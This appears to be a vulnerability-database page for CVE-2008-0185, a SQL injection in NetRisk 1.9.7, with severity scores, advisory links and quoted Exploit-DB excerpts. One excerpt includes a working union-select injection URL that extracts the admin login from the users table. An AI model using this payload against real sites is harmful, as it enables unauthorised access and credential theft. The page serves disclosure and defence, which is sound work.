CVE-2008-0185
published 2008-01-09CVE-2008-0185: SQL injection vulnerability in index.php in NetRisk 1.9.7 and possibly earlier versions allows remote attackers to execute arbitrary SQL commands via the pid…
PriorityP339high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
1.04%
59.8th percentile
SQL injection vulnerability in index.php in NetRisk 1.9.7 and possibly earlier versions allows remote attackers to execute arbitrary SQL commands via the pid parameter in a profile page (possibly profile.php).
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| netrisk | netrisk | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Microsoft Windows Media Center - '.MCL' File Processing Remote Code Execution (MS16-059)
exploitdb·2016-05-12·CVSS 7.8
CVE-2016-0185 [HIGH] Microsoft Windows Media Center - '.MCL' File Processing Remote Code Execution (MS16-059)
Microsoft Windows Media Center - '.MCL' File Processing Remote Code Execution (MS16-059)
---
Exploit Title: Microsoft Windows Media Center .MCL File Processing Remote Code Execution Vulnerability (MS16-059)
Date: May 11th, 2016
Exploit Author: Eduardo Braun Prado
Vendor Homepage : http://www.microsoft.com
Version: All prior to May 10th, 2016 update.
Tested on: Windows Media Center running on Microsoft Windows Vista, 2008, 7, 8, 8.1
CVE: CVE-2016-0185
Microsoft Windows Media Center (all versions prior to May 11th, 2016) contains a remote code execution upon processing specially crafted .MCL files. The vulnerability exists because Windows Media Center does not correctly processes paths in the "Run" parameter of the "Application" tag, bypassing the usual security warning displayed up
Exploit-DB
NetRisk 1.9.7 - Cross-Site Scripting / SQL Injection
exploitdb·2008-01-06
CVE-2008-0186 NetRisk 1.9.7 - Cross-Site Scripting / SQL Injection
NetRisk 1.9.7 - Cross-Site Scripting / SQL Injection
---
####################################################################
# #
# ...:::::netrisk 1.9.7 Multiple Remote Vulnerabilities::::.... #
# (sql injection/xss) #
####################################################################
Virangar Security Team
www.virangar.org
www.virangar.net
Discoverd By : virangar security team
(hadihadi)
special tnx to:MR.nosrati,black.shadowes,MR.hesy,satan,Zahra
& all virangar members & all hackerz
greetz:to my best friend in the world hadi_aryaie2004
vlues:
1.sql injection:
get admin login name:
http://site.com/patch/index.php?page=profile&pid=-1/**/union/**/select/**/1,2,login,4,5,6,7,8,9,10,11/**/from/**/users/**/where/**/id=1/*
---
get admin pass:
http://site.com/patch/index.php?page=pro
No writeups or analysis indexed.
http://secunia.com/advisories/28328http://sourceforge.net/project/shownotes.php?release_id=551208&group_id=129681http://www.securityfocus.com/archive/1/485834/100/0/threadedhttp://www.securityfocus.com/bid/27161https://www.exploit-db.com/exploits/4852http://secunia.com/advisories/28328http://sourceforge.net/project/shownotes.php?release_id=551208&group_id=129681http://www.securityfocus.com/archive/1/485834/100/0/threadedhttp://www.securityfocus.com/bid/27161https://www.exploit-db.com/exploits/4852
2008-01-09
Published